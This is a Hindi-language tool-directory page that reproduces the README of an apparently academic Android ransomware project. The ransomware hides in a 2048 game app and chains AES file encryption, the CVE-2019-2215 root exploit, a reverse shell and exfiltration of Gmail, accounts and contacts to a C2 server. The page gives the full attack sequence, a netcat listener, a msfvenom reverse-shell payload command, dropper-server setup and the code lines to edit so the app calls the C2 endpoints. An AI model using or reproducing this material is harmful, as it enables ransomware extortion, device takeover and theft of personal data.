Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/crackercat/rootsmart-v2.0
एंड्रॉइड सुरक्षाएन्क्रिप्शन/डिक्रिप्शन उपकरणभेद्यता विश्लेषणशोषणरिवर्स इंजीनियरिंगडेटा निष्कासनपेनिट्रेशन टेस्टिंगमोबाइल सुरक्षाकमांड एंड कंट्रोललर्निंग और शिक्षापेलोड डेवलपमेंट
274 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
crackercat/rootsmart-v2.0

Rootsmart-v2.0

एंड्रॉइड रैनसमवेयर विकास - AES256 एन्क्रिप्शन + CVE-2019-2215 (रिवर्स रूट शेल) + डेटा एक्सफिल्ट्रेशन

रिपॉजिटरी देखें

Rootsmart 2.0 w/ cve-2019-2215 + Ransomware

अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों के लिए है। इस प्रोजेक्ट में rkshrksh/2048-Game और kangtastic/cve-2019-2215 से कोड का उपयोग किया गया है।


परियोजना विवरण

यह प्रोजेक्ट सिंगापुर इंस्टीट्यूट ऑफ टेक्नोलॉजी के मोबाइल सुरक्षा मॉड्यूल का हिस्सा है। यह प्रोजेक्ट 6 सप्ताह के भीतर पूरा किया गया था और इसका उद्देश्य एक दुर्भावनापूर्ण एंड्रॉइड एप्लिकेशन विकसित करना था। ऐसा करने से, हमें यह सीखने में मदद मिली कि एंड्रॉइड ओएस में सुरक्षा तंत्र कैसे लागू किए जाते हैं और हम OWASP Mobile Top 10:2017 M8 - Code Tampering का उपयोग कैसे कर सकते हैं।

यह प्रोजेक्ट एक प्रूफ ऑफ कॉन्सेप्ट है जो एक कस्टम लिखित रैनसमवेयर को प्रदर्शित करता है जो AES एन्क्रिप्शन का उपयोग करता है, cve-2019-2215 को हथियार बनाता है, और संक्रमित डिवाइस से डेटा एक्सफिलट्रेट भी करता है।

इसे Android 10 और Google Pixel 2 XL पर परीक्षण किया गया है।

root@kitploit:~
├── 2048-Game 					// Android Project Folder
├── 2048-keystore				// Test-Keystore
├── cve-2019-2215				// Modified cve-2019-2215
│	└── cve-2019-2215.c
├── dropper_server				// Dropper server directory 
│	├── cve-2019-2215			// shells.zip content before zipping
│	├── dropper_server.py		// Dropper server program
│	├── exfiltrated_data.log
│	├── masterkeys.txt
│	├── ncat.exe 				// Netcat windows binary - for Reverse shell listener
│	├── requirements.txt
│	├── shells.zip  			// shells.zip that is hosted in root of dropper server
│	└── venv
└── test_images    				// test_images for easy adb push <image.ext> /sdcard/Pictures
आक्रमण वेक्टर:
  1. एप्लिकेशन इंस्टॉल करें, चलाएं और अनुमतियां दें
  2. रैनसमवेयर /sdcard/Pictures में सभी फाइलों को AES एन्क्रिप्ट करेगा
  3. प्रत्येक फाइल एक यादृच्छिक रूप से उत्पन्न कुंजी से एन्क्रिप्ट की जाएगी
  4. कुंजियाँ /sdcard/keys.json में संग्रहीत होंगी जहाँ प्रत्येक key:value जोड़ी filepath:key होगी
  5. C2 सर्वर पर GET HTTP /get_mk से MasterKey और VictimID प्रतिक्रिया निकाय में प्राप्त करें
  6. MasterKey keys.json को एन्क्रिप्ट करेगा, VictimID /sdcard/victimID.txt में संग्रहीत होगा
  7. एप्लिकेशन shells.zip डाउनलोड करेगा और सामग्री को अनज़िप करेगा
  8. अनज़िप की गई सामग्री से cve-2019-2215 बाइनरी निष्पादित करें
  9. एक रूट शेल प्रक्रिया स्पॉन की जाएगी और अनज़िप की गई सामग्री से install.sh चलाएगी
  10. install.sh अनज़िप की गई सामग्री से rs.elf निष्पादित करके आक्रमण सर्वर पर रिवर्स कनेक्शन भेजेगा
  11. एप्लिकेशन डिवाइस के gmail, उपयोगकर्ता खाता जानकारी और संपर्कों को एक्सफिलट्रेट करेगा
प्रदर्शन

https://user-images.githubusercontent.com/56181271/155875246-092a3954-2f42-42b7-a00e-581a1bbf0546.mp4


C2 (कमांड एंड कंट्रोल) - सेटअप

इस परीक्षण के लिए, सुनिश्चित करें कि पीड़ित फोन और C2 सर्वर एक ही सबनेट में हैं (अन्यथा C2 को सार्वजनिक इंटरनेट पर होस्ट करें)। C2 सर्वर के लिए 3 एंडपॉइंट हैं जो dropper/dropper_server.py में पाए जा सकते हैं:

  1. /process_command - GET से shells.zip डाउनलोड करें और cve-2019-2215 रूट एक्सप्लॉइट चलाएं
  2. /get_mk - GET से victimID:masterkey कुंजी-मूल्य जोड़ी प्राप्त करें ताकि /sdcard/keys.json एन्क्रिप्ट हो सके
  3. /postData - POST से एक्सफिलट्रेटेड gmail, संपर्क, खाता जानकारी भेजें
रिवर्स शेल सर्वर
root@kitploit:~
nc -lvnp 1337 # Ideally this should be the same IP as the dropper server
ड्रॉपर सर्वर
root@kitploit:~
# Generate rs.elf payload
msfvenom -p linux/aarch64/shell_reverse_tcp LHOST=<Attacker IP> LPORT=<Attacker Port> -f elf > rs.elf

# Better to run flask on Windows if WSL don't port forward localhost traffic to Windows Host
cd dropper
python3 -m venv venv # Create venv

# Activate venv
. venv/bin/activate # Linux
venv\Scripts\activate.bat # Windows
pip install -r requirements.txt --upgrade pip # Make sure host shell is root/Administrator

# Run C2 server
python3 dropper_server.py # WSL
python dropper_server.py # Windows

/dropper में shells.zip

  1. dropper/cve-2019-2215 फ़ोल्डर पर जाएं
  2. rs.elf बनाने के बाद, rs.elf + cve-2019-2215, install.sh को ज़िप करें
  3. ज़िप फ़ाइल का नाम बदलकर shells.zip करें
  4. shells.zip को /dropper में ले जाएं

APK संकलित करने से पहले निम्नलिखित संशोधित करें

जावा क्लासेज़

root@kitploit:~
// File : 2048-Game/app/src/main/java/aarkay/a2048game/Temproot.java
// Change IP and port according to dropper server IP and port
String URL = "http://192.168.157.73:8080/process_command"; // Line 19

// File : 2048-Game/app/src/main/java/aarkay/a2048game/Encrypt.java
// Change IP and port according to dropper server IP and port
String URL = "http://192.168.157.73:8080/get_mk"; // Line 45

// File : 2048-Game/app/src/main/java/aarkay/a2048game/PostData.java
// Change IP and port according to dropper server IP and port
String urlString = "http://192.168.157.73:8080/postData"; // Line 32
टूल डाउनलोड करें